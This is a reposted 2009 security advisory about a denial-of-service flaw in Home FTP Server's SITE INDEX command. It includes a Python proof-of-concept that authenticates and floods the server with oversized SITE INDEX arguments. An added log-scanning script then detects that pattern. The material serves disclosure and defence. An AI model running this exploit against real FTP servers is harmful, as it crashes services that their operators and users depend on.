
Title: Home FTP Server 'SITE INDEX' Command Remote Denial of Service Vulnerability

Author: zclzhao    Time: 2009-11-20 15:03     Title: Home FTP Server 'SITE INDEX' Command Remote Denial of Service Vulnerability

Affected versions:
Home Ftp Server Home Ftp Server 1.10.1 .139
Home Ftp Server Home Ftp Server 1.10 .138
Home Ftp Server Home Ftp Server 1.0.7 b45
Home Ftp Server Home Ftp Server 1.4.5 Build 84
Home Ftp Server Home Ftp Server 1.3.4.93
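Vulnerability description:
Bugtraq ID: 37033

Home FTP Server is an FTP server program.
Home FTP Server does not correctly handle the "SITE INDEX" command; a remote attacker can exploit this vulnerability to cause a denial of service in the server program.
The user must be successfully authenticated to trigger this vulnerability.
<*References
zhangmc[at]mail.ustc.edu.cn
http://www.securityfocus.com/archive/1/507893
*>
Test method:
[www.sebug.net]
The programs (methods) provided by this site may be offensive in nature and are intended for security research and teaching only; use at your own risk!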
#!/usr/bin/python
import socket
import sys

def Usage():
    print ("Usage: ./expl.py <serv_ip> <Username> <password>\n")
    print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")

if len(sys.argv) <> 4:
    Usage()
    sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    test_string="a"*30
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    for i in range(1,30):
        try:
            sock.connect((hostname, 21))
        except:
            print ("Connection error!")
            sys.exit(1)
        r=sock.recv(1024)
        print "[+] "+ r
        sock.send("user %s\r\n" %username)
        print "[-] "+ ("user %s\r\n" %username)
        r=sock.recv(1024)
        print "[+] "+ r
        sock.send("pass %s\r\n" %passwd)
        print "[-] "+ ("pass %s\r\n" %passwd)
        r=sock.recv(1024)
        print "[+] "+ r
        for i in range(1,20):
            sock.send("SITE INDEX "+ test_string*i +"\r\n")
            print "[-] "+ ("SITE INDEX "+ test_string +"\r\n")
            r=sock.recv(1024)
            print "[+] "+ r
        sock.close()
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sys.exit(0);

SEBUG security advisory:
No detailed solution is currently available:
http://downstairs.dnsalias.net/homeftpserver.html
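
With no fix available, watching for the command in server logs is the practical control. The following is an added example, not part of the original post or of SEBUG's material: it scans FTP command log lines for the pattern the test script produces, namely one client sending many SITE INDEX commands with oversized arguments. The log line format, the thresholds and the sample lines are constructed assumptions.

```python
import re
from collections import defaultdict

# Assumed thresholds (not from the advisory); tune them to local traffic.
MAX_ARG_LEN = 64      # SITE INDEX arguments longer than this are suspicious
MAX_PER_CLIENT = 10   # SITE INDEX commands tolerated per client in one log window

# Constructed log format: "<timestamp> <client_ip> <raw FTP command line>"
LINE_RE = re.compile(r"^(\S+) (\S+) (.*)$")
SITE_INDEX_RE = re.compile(r"^SITE\s+INDEX(?:\s+(.*))?$", re.IGNORECASE)


def find_site_index_abuse(lines, max_arg_len=MAX_ARG_LEN, max_per_client=MAX_PER_CLIENT):
    """Return {client_ip: [reason, ...]} for clients whose SITE INDEX use looks abusive."""
    counts = defaultdict(int)
    longest = defaultdict(int)
    for line in lines:
        m = LINE_RE.match(line.rstrip("\r\n"))
        if not m:
            continue  # line does not fit the assumed format
        client, command = m.group(2), m.group(3)
        cmd = SITE_INDEX_RE.match(command.strip())
        if not cmd:
            continue  # some other FTP command
        counts[client] += 1
        longest[client] = max(longest[client], len(cmd.group(1) or ""))
    findings = {}
    for client in counts:
        reasons = []
        if longest[client] > max_arg_len:
            reasons.append("oversized argument (%d chars)" % longest[client])
        if counts[client] > max_per_client:
            reasons.append("%d SITE INDEX commands" % counts[client])
        if reasons:
            findings[client] = reasons
    return findings

# Constructed sample: one ordinary client, one sending growing arguments.
SAMPLE_LOG = [
    "2009-11-20T15:03:01 10.0.0.5 USER alice",
    "2009-11-20T15:03:02 10.0.0.5 SITE INDEX readme",
] + [
    "2009-11-20T15:04:%02d 10.0.0.9 site index %s" % (i, "a" * 30 * i)
    for i in range(1, 20)
]

if __name__ == "__main__":
    for client, reasons in sorted(find_site_index_abuse(SAMPLE_LOG).items()):
        print(client, "; ".join(reasons))
```

Because the advisory states that authentication is required, correlating flagged clients with the account that logged in shows which credentials (including anonymous access) should be restricted.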



